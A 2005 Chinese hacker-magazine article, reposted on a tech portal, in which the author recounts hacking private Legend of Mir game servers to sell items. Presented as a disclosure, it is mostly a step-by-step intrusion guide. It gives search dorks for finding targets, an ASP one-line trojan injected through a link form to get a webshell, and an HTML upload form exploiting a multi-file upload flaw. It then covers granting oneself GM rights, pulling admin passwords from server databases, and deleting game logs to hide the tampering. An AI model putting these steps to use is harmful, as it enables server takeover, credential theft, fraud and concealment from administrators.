热点推荐

我曾经靠黑SF卖装备挂马挣钱

黑客防线 05年04月27日 【合作】 作者: [评论250]

适合读者:入侵爱好者

前置知识:无

脚本小子:2004年的网络是比较动荡的,很多人都在私下黑站、挂马、卖装备,同时国家屡紧不止的私服也在地下悄悄的开放着,吸引着很多人的眼光,也为挂马、卖装备的人提供了一份赖以生存的土壤。当然,有阴暗的一面就有光明的一面,国家逐步加大了对私服的打击力度,同时也有越来越多的人开始弃恶从善,走出这片泥潭,开始抛弃生活在地下的日子。新年到,我们热情地欢迎这些朋友的到来,以后我们将一起学习,一起进步,一起与阴暗势力做斗争!2005,我们一起努力!

我曾经靠黑SF卖装备挂马挣钱

    雄赳赳气昂昂跨进2005!在新的一年里回首2004年的往事,感觉特别幼稚可笑。我凭借着一点点的黑客技术,以黑客自居,甚至利用黑客技术入侵传奇私服,刷装备卖钱,由于入侵的方法涉及到本人发现的没有被公布的私服整站系统的漏洞,所以很多网络管理员并没有找到问题的根节所在,只能关闭服务器或者关闭网站做调整,后门并没有被真正清除。2005年了,本人左思右想,还是决定将入侵私服的方法公布出来,希望网络能更进一步的安定。

    这里先提两个最普及的私服整站系统,一个是Eihomemir传奇私服全站系统,另一套也是和此系统相似。它们的网页格式分别如下图1、2所示。


我曾经靠黑SF卖装备挂马挣钱
 
图1

我曾经靠黑SF卖装备挂马挣钱
 
图2


    对于这两套系统,我们获得WebShell简直容易得让人难以置信!
先说说怎么得到使用这两个版本的传奇私服吧:在百度上搜索“传奇inurl:wplm.htm”或者“传奇 inurl:zxxs.htm”,可获得很多使用第一套系统的传奇站点,同样使用“传奇 inurl:tuku”或者“传奇 inurl:coolsites.asp”可获得使用第二套版本的传奇站点。由于着两套系统有一个共同的漏洞,我就一起讲。

    找到使用这种版本的私服后,得到WebShell的几率有99%,假设我们要入侵的站点是http://www.XXX.com并且他使用这套系统。我们打开http://www.XXX.com/coolsites.asp,出现了“友情连接”的界面,站点名称和站点地址我们随便写,图片地址填写入如下代码:
11<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>trycatch(e){}</SCRIPT> 
哈哈,一看就知道是浪子的ASP木马,根据黑防第四轮实验室中公布的获取Sehll的办法,自然想到的是将数据库改名为.ASP并得到WebShell。我们先点提交,这样ASP木马就写到数据库里了。

    这套系统的数据库文件很多,下载一套样本回来看看,可以找到Data文件夹里有8个数据库文件,分别是:admin.asp,article.asp,diary.asp,down.asp,gb.asp,main.asp,news.asp和sites.asp。最可怕的是这些数据库并没有作防下载处理,哈哈。再加上不熟悉ASP程序的网管是不会一一修改数据库的连接文件的,有一个这样的数据库文件存在都可能成为我们的WebShell!
这里我选择了最容易利用的Sites.asp这个数据库,我们刚才的操作已经将ASP木马写到了Sites.asp这个数据库中,如果管理员没有将这个文件改名的话(这么多的数据库文件,我想管理员是不会对不重要的文件改名的,事实上遇到的N个站也证实确实如此),我们就可以用浪子的客户端连上去了,如图3、4所示。

我曾经靠黑SF卖装备挂马挣钱
 
图3

我曾经靠黑SF卖装备挂马挣钱
 
图4

看!我们已经得到WebShell了。
由于这个木马功能太少了,我们要传一个功能强大的ASP木马上去,如海洋顶端ASP木马。在上传中尽量不要用文件流上传,那样会消耗服务器很多的内存。建议使用如下的方法:选择冰狐ASP客户端2.0运行,然后在WEB路径下新建一个文件,最后选择写入文件,将海洋的ASP木马写入刚才新建的那个文件中。哈哈,看看我们的成果,如图5所示。

我曾经靠黑SF卖装备挂马挣钱
 
图5

    小提示:站点的WEB物理路径可从冰狐浪子微型ASP木马的“环境探测”中得到。

WebShell得到了,下面的事就是添加GM、刷装备、清日志了。如果网站的传奇服务器和网站是在一台机器上,一般会把传奇服务端放在D:\或E:\下,本例中我们看到的D:\MirServer就是传奇私服服务端程序。

    在这里我要说说服务端的几个重要的数据库文件,第一个是“d:\MirServer\Mud2\DBSrv200\FDB\Hum.DB”,这个文件记录着角色名对应的账号名,即ID,第二个是“d:\MirServer\Mud2\LogSrv\IDDB\Id.DB”,它记录着ID账号的密码,“:\MirServer\Mir200\Envir\AdminList.txt”则是GM文件列表,如图6所示。

我曾经靠黑SF卖装备挂马挣钱
 
图6

我们只要在里面添加一个角色名称就成为GM了,添加格式如下:
* iamwuming(注意*和角色名之间有个空格)
然后保存就可以了,如果提示没有权限,可能管理员把它设为只读属性了,不用怕,用砍客ASP木马将这个文件的只读属性去掉就可以了。下面要做的就是将“d:\MirServer\Mud2\DBSrv200\FDB\Hum.DB和d:\MirServer\Mud2\LogSrv\IDDB\Id.DB”下载下来,用UltraEdit打开,在AdminList.txt中我们看到了GM的角色名,在Hum.db中查找GM的角色名所对应的ID账号,如图7、8所示。

我曾经靠黑SF卖装备挂马挣钱
 
图7

我曾经靠黑SF卖装备挂马挣钱
 
图8

看,Psujun就是GM的账号了。另外在Id.db中查找Psujun就可得到GM的密码,如图9所示。

我曾经靠黑SF卖装备挂马挣钱
 
图9

这里对应的密码为:8857126net。
好了,下面的工作是得到GM命令了。许多管理员为了防备私服的后门命令@testga,基本将危险的GM命令都改名了,即使我们得到GM权限,也没有任何价值。不过这里我们可以先下栽服务器上的D:\MirServer\Mir200\m2server.exe程序到本地,然后到网上下载GM命令修改器将修改器和m2server.exe放到同一个目录下运行,GM命令修改器就可以查看所有GM命令了。如图10所示。

我曾经靠黑SF卖装备挂马挣钱
 
图10

然后我们用得到的GM账号进入服务器,重读GM文件(这个是我们查看到的命令)。这样不用服务器重启,我们加的角色iamwuming就成为GM了。

    小提示:如果查到命令还是不是能够使用,可打开D:\MirServer\Mir200\Envir这个目录,一定有个Command.txt了,GM命令都在里面了,找就是了。 好了,用加的GM账号进去看看把,是GM了把?哈哈,使劲刷装备吧!

GM也当了,装备也刷了,最后该清理日志了。 在“\mirserver\gamelog\LogDataSrv\LogBase”下是所有玩家的标志,如图11所示。

我曾经靠黑SF卖装备挂马挣钱
 
图11

以每十分钟一个文件的形式记录,打开它会出现一行行类似下一行的文字:
1 0 0 5 0 333 333 iamwuming 麻痹戒指 197139932310 2000-01-01 00:05:31
上一行的意思是“一个叫iamwuming的玩家在地图名为0坐标为333 333制造了麻痹戒指”。

    小提示:其中第四个数字是所有玩家使用物品动作的代码,7是扔物品,4是捡物品,8是玩家之间的交易,9是买物品,10是卖物品,11是使用物品,5是死亡后掉的物品,19是被杀,1是存物品,0是取物品,6是毁掉物品(new),5是制造物品(new)。

知道了这些我们就好办了,打开D:\mirserver\gamelog\LogDataSrv\LogBase\,把自己刷东西的那个时间内的日志直接给删了就行了,这样我们制造的东西管理员就不会找到了。
在这里顺便告诉大家一个好用的命令就是“@制造武器”,在传奇中把武器拿在手中,然后打入“@制造武器 -1 -1 -1 -1”,我们的武器就会变成攻击255,道术255,魔法255的极品武器了,这样的武器拿到手中才有GM的感觉呢,呵呵!

    说到这里已经成功入侵了传奇私服了,而且后门是写到数据库里的,管理员就是用再NB的杀毒软件也是杀不出来,安全性是非常高的。

    还有一套私服整站系统使用的是落日整站系统,我们都知道那套系统存在上传漏洞,受影响的文件是Uolaodfile.asp,删除这个文件就没事了。还有一套系统的使用率更是高,就是动力3.51改过来的整站系统,如图12所示。

我曾经靠黑SF卖装备挂马挣钱
 
图12

这套系统的漏洞是由于没有对上传变量初始化,在处理多个文件上传时,可以将ASP文件上传到网站目录。利用方法也是相当简单的:在网站注册个账号后在同一个窗口中打开如下的Up.htm:
<form action="http://www.target.com/upfile_article.asp" method="post" name="form1" onSubmit="return check()" enctype="multipart/form-data">
  <input name="FileName" type="FILE" class="tx1" size="20">
  <input name="FileName1" type="FILE" class="tx1" size="20">
  <input type="submit" name="Submit" value="上传" style="border:1px double rgb(88,88,88);font:9pt">
  <input name="ImgWidth" type="hidden" id="ImgWidth">
  <input name="ImgHeight" type="hidden" id="ImgHeight">
  <input name="AlignType" type="hidden" id="AlignType">
</form>

    前一个空选择个Gif文件,后个选一个ASP文件,并在路径下文件名后加个空格,然后上传,通过查看源文件就可以看到自己上传的脚本木马了。

    有时候真不知道管理员都是干什么的,2004年8月这个漏洞都公布了,黑防更是详细分析了很多次,但不少使用着套系统的管理员都没有升级或者打补丁。更有甚者,大部分私服是用动网v7.0.0.0 sp2,自以为安全多了,可惜连数据库路径都不修,这样恶意攻击者下载了数据库后,打开Dv_log这个表就可以很容易找到前后台管理员账号和密码了。

    说到这里已经涉及到网络上流传的大部分的私服整站系统了,对于动力3.51上传漏洞的修补,可以到动力官方网站获得。相信公布了这篇文章后,我就不能再靠卖传奇私服装备来赚钱了。在新的一年里,努力学习知识,考取英语6级证,考取研究生才是我的目标,同时也希望像我一样靠黑站挂马,黑传奇私服卖装备赚钱的黑友们停下来吧!毕竟我们还有更重要目标去实现!

请您为本文做个评价:
价格及相关信息不准请拨打 ZOL(7 X 8)小时免费投诉电话:400-678-0068-6 免费拨打ZOL客务电话
文章评论
笔记本,台式机 拨打800-858-2339,为您量身打造!